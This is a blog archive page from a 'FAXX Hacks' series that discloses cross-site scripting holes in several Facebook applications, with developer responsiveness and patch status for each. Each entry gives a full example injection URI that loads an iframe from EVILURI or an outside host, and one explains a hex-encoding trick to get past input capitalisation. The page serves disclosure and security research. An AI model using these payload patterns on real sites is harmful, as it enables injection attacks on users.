Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Bumper Stars
Facebook Verified Application
Current Monthly Active Users: 55,431
Current Rank on Application Leaderboard: 659
Application Developer: Large Animal Games
Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/bumperstars/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E
Notes: You’ll notice the example URI only inserts an iframe, rather than attempting the sort of double-injection of previous examples. Bumper Stars, and two other Large Animal Games applications that will be posted soon, use Facebook’s server whitelist feature for API requests. This means that trying to use injected JavaScript to make API calls will fail, as they originate from the user’s computer and not LAG’s servers. One could still have used the XSS hole to launch a malware attack, but using the whitelist prevents stealing profile information or launching a viral attack via notifications and feed stories.
Bumper Stars was the first application I’ve encountered that made use of the server whitelist feature, and I commend LAG for that step. But while the feature can prevent many of the attacks I’ve outlined, it is not practical for every application. Many other developers make use of the JavaScript API for legitimate calls, and these would fail if the developer enabled a server whitelist.
Keep Reading »Posted by theharmonyguy in FAXX Hacks | 2 comments
FAXX Hack: kaChing
Facebook Verified Application
Current Monthly Active Users: 28,778
Current Rank on Application Leaderboard: 963
Application Developer: kaChing Group, Inc.
Responsiveness: I received an e-mail from kaChing saying the patch was fixed about six hours after notifying them.
Vulnerability Status: Patched
Capable of Clickjacking Install: Uncertain
Example URI: http://apps.facebook.com/kaching/portfolio/trade?symbol=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F%26%23×66%3B%26%23×62%3B%2F%26%23×70%3B%26%23x6F%3B%26%23×72%3B%26%23×74%3B%26%23×66%3B%26%23x6F%3B%26%23x6C%3B%26%23×69%3B%26%23x6F%3B%2F%26%23×74%3B%26%23×72%3B%26%23×61%3B%26%23×64%3B%26%23×65%3B%3F%26%23×73%3B%26%23×79%3B%26%23x6D%3B%26%23×62%3B%26%23x6F%3B%26%23x6C%3B%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E
Notes: This hole was very straightforward, but fully exploiting it required one more trick. Since the injected parameter was a stock symbol, the resulting page would automatically capitalize the input when displaying an error message. That meant that the injected URI became uppercase when it needed to be lowercase. To combat that issue, I converted the text parts of the URI to hex encodings, then had to encode those values for a URI. All these steps resulted in the rather lengthy URI above, which did preserve capitalization.
P.S. Those should be lowercase x’s in the example URI.
Keep Reading »Posted by theharmonyguy in FAXX Hacks | 1 comment
FAXX Hack: Birthday Cards
Current Monthly Active Users: 9,067,238
Current Rank on Application Leaderboard: 18
Application Developer: RockYou
Responsiveness: Once again, RockYou never sent a message but did patch the hole.
Vulnerability Status: Patched
Capable of Clickjacking Install: No
Example URI: http://apps.facebook.com/rybirthday/zoo/shop.php?category=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http://fb.rockyou.com/facebook_apps/rybirthdays/zoo/shop.php?category=%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Bumper Sticker
Double hacks tomorrow to make up for Monday’s break.
Facebook Verified Application
Current Monthly Active Users: 5,422,286
Current Rank on Application Leaderboard: 29
Application Developer: LinkedIn
Responsiveness: I sent this hole to Facebook on Sep. 1, then followed up with an e-mail to LinkedIn over the weekend.
Vulnerability Status: Unpatched Patched Sep. 24
Capable of Clickjacking Install: No
Example URI: http://apps.new.facebook.com/bumpersticker/stickers/show/60441592?confirm_add=1&explanation=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2F11piecesofflare.com%2Fstickers%2Fshow%2F60441592%3Fconfirm_add%3D1%26explanation%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E
Keep Reading »Posted by theharmonyguy in FAXX Hacks | No comments
Quick Update on FAXX Hacks
I did not post a FAXX hack on Monday for two reasons. First, I had forgotten to factor in the long weekend (Monday is Labor Day in the US) when notifying developers, hence posting would not have allowed an actual business day to pass before releasing details. Second, I spent most all of Saturday and again Monday in bed. I haven’t been terribly sick, but I’ve been dealing with tiredness and weakness.
None of this means I’ve hit a point where I lack for material. To make up for Monday’s omission, I will be posting two hacks one day this week. I may take another break on Tuesday to ensure developers have time to patch holes, but if that happens, I’ll simply post two hacks on a second day as well. The “month of Facebook bugs” is far from over.
Keep Reading »Content License
All content by theharmonyguy on this site, including text and images, is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.